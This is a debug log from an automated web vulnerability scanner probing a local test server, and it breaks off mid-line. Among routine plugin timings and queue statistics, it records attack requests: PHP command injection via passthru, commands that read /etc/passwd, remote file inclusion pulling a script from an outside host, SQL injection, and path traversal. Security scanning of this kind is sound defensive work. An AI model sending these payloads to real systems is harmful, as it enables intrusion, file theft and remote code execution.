(id=23403,from_cache=0,grep=1,rtt=0.14,did=6apXvBLC) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/photo/manage.cgi returned HTTP code "404" (id=23396,from_cache=0,grep=1,rtt=0.22,did=OmaF6MIJ) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cpqlogin.htm returned HTTP code "404" (id=23401,from_cache=0,grep=1,rtt=0.20,did=TOdG07Eo) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/index.php?name=forums&file=viewtopic&t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23397,from_cache=0,grep=1,rtt=0.11,did=vVrnBlbk) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/22/exec/show returned HTTP code "404" (id=23392,from_cache=0,grep=1,rtt=0.04,did=314CAIu6) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/stat.pl returned HTTP code "404" (id=23393,from_cache=0,grep=1,rtt=0.18,did=3OGwfql5) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/99/exec/show returned HTTP code "404" (id=23408,from_cache=0,grep=1,rtt=0.09,did=IlTXG5mU) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23411,from_cache=0,grep=1,rtt=0.05,did=kCNJslCz) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/89/exec/show returned HTTP code "404" (id=23398,from_cache=0,grep=1,rtt=0.29,did=Od03zHI4) [Wed Feb 12 10:04:29 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12046, 'reject-seen-url': 5609, 'reject-out-of-scope': 216, 'accept': 4904} [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/server-status returned HTTP code "404" (id=23402,from_cache=0,grep=1,rtt=0.23,did=al4NfESi) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 returned HTTP code "302" (id=23409,from_cache=0,grep=1,rtt=0.11,did=K60OhJsR) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/70/exec/show returned HTTP code "404" (id=23412,from_cache=0,grep=1,rtt=0.07,did=6YtCdfuB) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/pfdisplay.cgi?\'\n/bin/cat /etc/passwd|\'= returned HTTP code "404" (id=23407,from_cache=0,grep=1,rtt=0.41,did=tsvwT1bS) [Wed Feb 12 10:04:29 2020 - debug] POST http://localhost:9090/_vti_bin/shtml.exe/_vti_rpc?method=server version:4.0.2.2611 returned HTTP code "404" (id=23399,from_cache=0,grep=1,rtt=0.15,did=N7UQy1tD) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/SiteScope/htdocs/SiteScope.html returned HTTP code "404" (id=23404,from_cache=0,grep=1,rtt=0.25,did=pMFYqtRM) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/postnuke/html/viewtopic.php?t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23406,from_cache=0,grep=1,rtt=0.13,did=dH8xpQzM) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/61/exec/show returned HTTP code "404" (id=23410,from_cache=0,grep=1,rtt=0.03,did=BZaHChv2) [Wed Feb 12 10:04:29 2020 - debug] vulners_db.grep(uri="http://localhost:9090/14/") took 0.14s to run [Wed Feb 12 10:04:29 2020 - debug] keys.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/phpBB2/includes/db.php?phpbb_root_path=http://cirt.net/rfiinc.txt returned HTTP code "404" (id=23414,from_cache=0,grep=1,rtt=0.07,did=g8wdXcvy) [Wed Feb 12 10:04:29 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] clamav.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/Backup/add-passwd.cgi returned HTTP code "404" (id=23416,from_cache=0,grep=1,rtt=0.26,did=K9sZ5GVs) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/ext.ini.\x00.txt returned HTTP code "404" (id=23415,from_cache=0,grep=1,rtt=0.12,did=b5Q8FEsD) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4502. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2185. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/mambo/administrator/phpinfo.php returned HTTP code "404" (id=23413,from_cache=0,grep=1,rtt=0.05,did=IBKZzXqv) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/16/level/16/exec/show/interfaces returned HTTP code "404" (id=23418,from_cache=0,grep=1,rtt=0.09,did=r5BxF04B) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/sscd_suncourier.pl returned HTTP code "404" (id=23420,from_cache=0,grep=1,rtt=0.21,did=s4pgRPpv) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/etc/passw* returned HTTP code "404" (id=23417,from_cache=0,grep=1,rtt=0.03,did=ovJjNNY0) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/affich.php?image= returned HTTP code "404" (id=23422,from_cache=0,grep=1,rtt=0.17,did=1EQMAhmz) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2186. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4503. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full returned HTTP code "404" (id=23419,from_cache=0,grep=1,rtt=0.16,did=bR2vIjFb) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/login/sm_login_screen.php?error=\\"> returned HTTP code "404" (id=23421,from_cache=0,grep=1,rtt=0.04,did=DtYaA64z) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/blahb.ida returned HTTP code "404" (id=23423,from_cache=0,grep=1,rtt=0.13,did=dOT7GUXP) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/forum/viewtopic.php?t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23424,from_cache=0,grep=1,rtt=0.03,did=oW58Wej6) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/cgi-bin/csGuestBook.cgi?command=savesetup&setup=&system(\'cat /etc/passwd\')= returned HTTP code "404" (id=23430,from_cache=0,grep=1,rtt=0.03,did=PExgK42J) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/WINDMAIL.EXE? -n c:\\boot.ini Hacker@hax0r.com | dir c:\\\\= returned HTTP code "404" (id=23429,from_cache=0,grep=1,rtt=0.08,did=QQLzKY8H) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/_vti_pvt/service.cnf returned HTTP code "404" (id=23427,from_cache=0,grep=1,rtt=0.06,did=IZDeJJW2) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4504. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23425,from_cache=0,grep=1,rtt=0.12,did=YRMa74xo) [Wed Feb 12 10:04:29 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12065, 'reject-seen-url': 5609, 'reject-out-of-scope': 216, 'accept': 4910} [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2187. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/lcgi/lcgitest.nlm returned HTTP code "404" (id=23428,from_cache=0,grep=1,rtt=0.11,did=StK3Vcrf) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/41/exec/show returned HTTP code "404" (id=23426,from_cache=0,grep=1,rtt=0.19,did=ZUWGRqz5) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/32/exec/show returned HTTP code "404" (id=23432,from_cache=0,grep=1,rtt=0.03,did=pQf8Qf8Z) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/52/exec/show returned HTTP code "404" (id=23431,from_cache=0,grep=1,rtt=0.10,did=C3TPsXiH) [Wed Feb 12 10:04:29 2020 - debug] localhost:9090 connection pool stats (free:147 / in_use:9 / max:50 / total:156) [Wed Feb 12 10:04:29 2020 - debug] Connections with more in use time: (c0c38b87fdd9dca3, 0.10 sec) (f0675d98b37e1a04, 0.07 sec) (e31e22640a03936b, 0.06 sec) (0234fcc660fc843a, 0.05 sec) (3bd0f6551a504a60, 0.05 sec) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4505. [Wed Feb 12 10:04:29 2020 - debug] url_session.grep(uri="http://localhost:9090/14/") took 0.06s to run [Wed Feb 12 10:04:29 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] objects.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] error_500.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2188. [Wed Feb 12 10:04:29 2020 - debug] password_profiling.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] click_jacking.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/banners.php?op=EmailStats&cid=1 AND passwd LIKE \'a%\'/* returned HTTP code "404" (id=23433,from_cache=0,grep=1,rtt=0.01,did=UtR1OIx7) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/71/exec/show returned HTTP code "404" (id=23434,from_cache=0,grep=1,rtt=0.03,did=4z2ehQ2S) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2189. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/cgi-bin/cachemgr.cgi returned HTTP code "404" (id=23435,from_cache=0,grep=1,rtt=0.13,did=1z1jAxKE) [Wed Feb 12 10:04:29 2020 - debug] meta_tags.grep(uri="http://localhost:9090/14/") took 0.10s to run [Wed Feb 12 10:04:29 2020 - debug] lang.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] error_pages.grep(uri="http://localhost:9090/14/") took 0.03s to run [Wed Feb 12 10:04:29 2020 - debug] strange_reason.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] cache_control.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] strange_headers.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] ssn.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] oracle.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] feeds.grep(uri="http://localhost:9090/14/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2190. [Wed Feb 12 10:04:29 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/14/") took 0.11s to run [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4505. [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/buddylist.blt returned HTTP code "404" (id=23436,from_cache=0,grep=1,rtt=0.09,did=66WKH3PZ) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/agentadmin.php returned HTTP code "404" (id=23437,from_cache=0,grep=1,rtt=0.10,did=Xjk0dEPt) [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/index.php?name=Forums&file=viewtopic&t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23438,from_cache=0,grep=1,rtt=0.10,did=26FqpStj) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2191. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4505. [Wed Feb 12 10:04:29 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/14/") took 0.08s to run [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2192. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4506. [Wed Feb 12 10:04:29 2020 - debug] GET http://localhost:9090/?PageServices= returned HTTP code "302" (id=23439,from_cache=0,grep=1,rtt=0.13,did=sZEbS2pC) [Wed Feb 12 10:04:29 2020 - debug] HEAD http://localhost:9090/level/23/exec/show returned HTTP code "404" (id=23440,from_cache=0,grep=1,rtt=0.09,did=zmZd3EQh) [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4507. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2193. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4508. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2194. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4509. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4510. [Wed Feb 12 10:04:29 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2195. [Wed Feb 12 10:04:29 2020 - debug] symfony.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] svn_users.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] private_ip.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] motw.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] meta_generator.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] retirejs.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] expect_ct.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:29 2020 - debug] serialized_object.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] blank_body.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] credit_cards.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] websockets_links.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] csp.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] dom_xss.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] file_upload.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:29 2020 - debug] localhost:9090 connection pool stats (free:155 / in_use:2 / max:50 / total:157) [Wed Feb 12 10:04:30 2020 - debug] Connections with more in use time: (9f657ff5db477850, 0.01 sec) (bc63b5bc4c5dcb75, 0.00 sec) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/iisadmpwd/aexp4b.htr returned HTTP code "404" (id=23441,from_cache=0,grep=1,rtt=0.07,did=VydCiD1r) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/gallery/captionator.php?GALLERY_BASEDIR=http://cirt.net/rfiinc.txt returned HTTP code "404" (id=23442,from_cache=0,grep=1,rtt=0.11,did=hsQTuX18) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/80/exec/show returned HTTP code "404" (id=23443,from_cache=0,grep=1,rtt=0.05,did=96LeJcFn) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/_vti_pvt/services.cnf returned HTTP code "404" (id=23445,from_cache=0,grep=1,rtt=0.06,did=gQ4w3c6i) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/webdriver returned HTTP code "404" (id=23447,from_cache=0,grep=1,rtt=0.06,did=YhIcHhkA) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/main_page.php returned HTTP code "404" (id=23449,from_cache=0,grep=1,rtt=0.21,did=G1iO9xAU) [Wed Feb 12 10:04:30 2020 - debug] vulners_db.grep(uri="http://localhost:9090/b/") took 0.10s to run [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/blahb.idq returned HTTP code "404" (id=23456,from_cache=0,grep=1,rtt=0.10,did=4pAgC2rV) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/photodata/manage.cgi returned HTTP code "404" (id=23444,from_cache=0,grep=1,rtt=0.11,did=yVADwEkp) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/scripts/samples/search/qfullhit.htw returned HTTP code "404" (id=23450,from_cache=0,grep=1,rtt=0.05,did=m751ExDm) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/diapo.php?rep= returned HTTP code "404" (id=23454,from_cache=0,grep=1,rtt=0.10,did=qeGw8oDe) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/counter/1/n/n/0/3/5/0/a/123.gif returned HTTP code "404" (id=23458,from_cache=0,grep=1,rtt=0.12,did=0b64e7J8) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/90/exec/show returned HTTP code "404" (id=23457,from_cache=0,grep=1,rtt=0.08,did=NX1ubqqU) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/mchat.cgi returned HTTP code "404" (id=23455,from_cache=0,grep=1,rtt=0.09,did=IZUaf0Mk) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/soapdocs/ReleaseNotes.html returned HTTP code "404" (id=23452,from_cache=0,grep=1,rtt=0.05,did=cZ0iJLVR) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23460,from_cache=0,grep=1,rtt=0.08,did=oDNChs07) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/16/level/16/exec/show/interfaces/status returned HTTP code "404" (id=23461,from_cache=0,grep=1,rtt=0.02,did=OdhgC35J) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/mail/addressaction.html?id== returned HTTP code "404" (id=23466,from_cache=0,grep=1,rtt=0.07,did=cEvQjWYX) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4511. [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2196. [Wed Feb 12 10:04:30 2020 - debug] url_session.grep(uri="http://localhost:9090/b/") took 0.15s to run [Wed Feb 12 10:04:30 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/modules/viewtopic.php?t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23453,from_cache=0,grep=1,rtt=0.23,did=9gel5Q0N) [Wed Feb 12 10:04:30 2020 - debug] error_pages.grep(uri="http://localhost:9090/b/") took 0.02s to run [Wed Feb 12 10:04:30 2020 - debug] strange_reason.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] cache_control.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] strange_headers.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] ssn.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] oracle.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] feeds.grep(uri="http://localhost:9090/b/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/42/exec/show returned HTTP code "404" (id=23468,from_cache=0,grep=1,rtt=0.04,did=9rvmR3ny) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/33/exec/show returned HTTP code "404" (id=23469,from_cache=0,grep=1,rtt=0.12,did=rDlC0gz4) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/ppdscgi.exe returned HTTP code "404" (id=23471,from_cache=0,grep=1,rtt=0.16,did=uLHedOKg) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2197. [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23467,from_cache=0,grep=1,rtt=0.07,did=saqfwbp9) [Wed Feb 12 10:04:30 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/b/") took 0.07s to run [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/?wp-cs-dump= returned HTTP code "302" (id=23472,from_cache=0,grep=1,rtt=0.08,did=GZ8wMQoF) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4512. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/53/exec/show returned HTTP code "404" (id=23470,from_cache=0,grep=1,rtt=0.16,did=Rzc0uILI) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/com/ returned HTTP code "404" (id=23476,from_cache=0,grep=1,rtt=0.04,did=QwUnNXb8) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/acceso/ returned HTTP code "404" (id=23478,from_cache=0,grep=1,rtt=0.14,did=JjkjeMbi) [Wed Feb 12 10:04:30 2020 - debug] localhost:9090 connection pool stats (free:154 / in_use:5 / max:50 / total:159) [Wed Feb 12 10:04:30 2020 - debug] Connections with more in use time: (349858decdf69be4, 0.09 sec) (911ffcfb522f3c7c, 0.09 sec) (74290a68deaae420, 0.07 sec) (9f657ff5db477850, 0.06 sec) (41d156243841893c, 0.05 sec) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/addalink.cgi returned HTTP code "404" (id=23480,from_cache=0,grep=1,rtt=0.10,did=vQkagTYY) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/viewtopic.php?t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23474,from_cache=0,grep=1,rtt=0.12,did=0ae4PgK9) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/ip.txt returned HTTP code "404" (id=23473,from_cache=0,grep=1,rtt=0.13,did=dPfVeAWj) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/c32web.exe/ChangeAdminPassword returned HTTP code "404" (id=23482,from_cache=0,grep=1,rtt=0.14,did=KigvObZu) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/login/sm_login_screen.php?uid=\\"> returned HTTP code "404" (id=23484,from_cache=0,grep=1,rtt=0.19,did=GL4Nhztd) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/_vti_pvt/svacl.cnf returned HTTP code "404" (id=23486,from_cache=0,grep=1,rtt=0.14,did=5VCNjEc7) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/24/exec/show returned HTTP code "404" (id=23488,from_cache=0,grep=1,rtt=0.11,did=tksLoP7c) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/ returned HTTP code "404" (id=23490,from_cache=0,grep=1,rtt=0.07,did=cwCLkoZD) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4513. [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2198. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/72/exec/show returned HTTP code "404" (id=23479,from_cache=0,grep=1,rtt=0.02,did=7Uu3efuI) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/bytehoard/index.php?infolder=../../../../../../../../../../../etc/ returned HTTP code "404" (id=23477,from_cache=0,grep=1,rtt=0.08,did=Gbce4MBZ) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/cgi-bin/ returned HTTP code "404" (id=23400,from_cache=0,grep=1,rtt=0.02,did=AttsxEbp) [Wed Feb 12 10:04:30 2020 - debug] POST http://localhost:9090/_vti_bin/_vti_aut/author.dll?method=list 